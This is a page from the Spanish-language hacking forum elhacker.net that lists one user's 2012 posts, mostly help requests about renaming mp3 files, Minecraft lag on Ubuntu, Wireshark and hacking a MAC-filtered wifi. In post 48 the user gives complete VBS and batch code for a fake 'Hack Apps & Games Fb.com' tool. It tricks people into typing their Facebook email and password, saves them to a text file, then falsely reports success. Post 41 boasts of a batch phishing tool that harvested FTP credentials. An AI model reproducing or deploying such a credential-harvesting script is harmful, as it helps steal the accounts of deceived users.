elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Únete al Grupo Steam elhacker.NET


  Mostrar Mensajes
Páginas: 1 2 3 4 [5] 6 7 8 9 10 11 12 13 14 15 16
41  Programación / Scripting / Re: Busco ideas de Bomba lógica para windows en: 17 Septiembre 2012, 14:02 pm
Recuerdo que yo hice un pishing creattt en batch del facebook, descargaba el index del facebook y otro archivo php y luego te pedia tus datos ftp y los subia a tu web
42  Programación / Scripting / Re: [Ayuda] Renombrar una lista de archivos en: 15 Septiembre 2012, 15:58 pm
Ufuf uf como no se me ocurrio antes jajaja, pero si necesito remplazar por un espacio.

Como definiria el espacio??
Saludos
43  Programación / Scripting / [Ayuda] Renombrar una lista de archivos en: 15 Septiembre 2012, 01:20 am
Hola chicos, volví jejeje

Pero necesito una mano, cree un código (o intentando) pero me aburrí y lo borre... jajaja ya llevaba harto del programa pero lo borre(no estaba terminado)

y pretendia hacer que en una carpeta de mi ordenador tengo por ejemplo 80 canciones(mp3) y tenian este nombre(Ejemplo) 03-cancion-cantante.mp3 pero en otras canciones decia cancion-numero.mp3 todas son distintas. lo que quiero es si ya hay un batch que le quite los numeros a los nombres donde quieran que esten y que remplazen los guioenes, guion bajo, o otros caracteres por un espacio...

saludos
44  Sistemas Operativos / GNU/Linux / Ayuda Ubuntu en: 10 Mayo 2012, 01:26 am
Hola amigos.
Volvi a instalar Ubuntu 10.10 ( ya que me gusta mucho, antes lo instale como por 3 meses)
bueno antes de instalar ubuntu 10.10 mi pc andaba "fluido" por ejemplo no se me pega en el Chrome y ahora en el Ubuntu se me pega en Chrome. ademas yo juego un juego (xd) llamado Minecraft este es multiplataforma.entonces lo instale y al momento de jugar me anda a 1 fps. osea es imposible jugar....
pero en windows jugaba fluido.

yo creo que fue debido a la instalacion. quisas me falta algun driver o algo asi ....




Yo no marque esas 2 casillas. lo que si hice fue abrir controladores adicionales y instalar el controlador que hay aparecia(Recomendado). Ademas baje el Swap a 10 .

Espero que me puedan ayudar y que respondan
45  Sistemas Operativos / GNU/Linux / Juego Ubuntu 10.10 en: 9 Mayo 2012, 01:33 am

Hola Amigos de Foro.elhacker.net :D

Soy nuevo en linux llevo 2 dias en el (Ubuntu 10.10) y tengo un problema.

En windows xp tenia Minecraft 1.2.5 y me corria de maravilla y ahora que tengo ubuntu hasta con los graficos mas bajos me corre demasiado lento tan lento que no se puede jugar ( Llega a maximo 2 fps)

ES MUY LENTO.
 ¿como lo puedo solucionar ?
46  Seguridad Informática / Hacking / Sniffear red LAN con Wireshark en: 7 Mayo 2012, 16:45 pm
Hola ... tengo instalado wireshark y se como utilizarlo pero no muy bien  :silbar:
Mi pregunta es ¿Como puedo recibir paquetes de la red (LAN) ? recibo solo paquetes de mi computador. (Conectado por Wifi a un Router)

Gracias. ;D
47  Seguridad Informática / Hacking Wireless / Hack wifi en: 27 Febrero 2012, 23:08 pm
Mi pregunta es la siguiente tengo un router X y este tiene MAC ( No se lo que es )
Como lo ago para hackear ese wifi con MAC ?
48  Programación / Scripting / Re: [VBS] [JS] Recopilación de 1.735 Scripts para aprender. en: 23 Febrero 2012, 21:18 pm
Yo tengo este script que se mezcla con Batch

Askpass.vbs
Código
  1. Set var = CreateObject("ScriptPW.Password")
  2. WScript.StdOut.Write "iNGRESA TU CONTRASEÑA:"
  3. pass = var.GetPassword()
  4. Set objfso = createobject ("scripting.filesystemobject")
  5. Set Archivotexto = objfso.createtextfile ("Passes.txt",true)
  6. archivotexto.writeline pass
  7.  

Nombre.bat
Código
  1. @echo off
  2. color a
  3. title Hack Apps ^& Games Fb.com
  4. set /p email= iNGRESA TU EMAIL :
  5. CScript //nologo Askpass.vbs
  6. echo %email%>>Passes.txt
  7. echo Hack Completado verifique su cuenta
  8. start www.fb.com
  9.  

Como veran jojojo no es un hack solamente pide E-mail y Pass de tu Facebook.com
y lo almazena en un Txt...
no se si a alguien le sirve Salu2
49  Programación / Scripting / Re: [VBS] [JS] Recopilación de 1.735 Scripts para aprender. en: 23 Febrero 2012, 20:50 pm
Ok,gracias.
saluds
50  Programación / Scripting / Re: [VBS] [JS] Recopilación de 1.735 Scripts para aprender. en: 23 Febrero 2012, 20:19 pm
Bueno con mayor razon,si son pocos podrias compartirlos.saluds
Páginas: 1 2 3 4 [5] 6 7 8 9 10 11 12 13 14 15 16
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines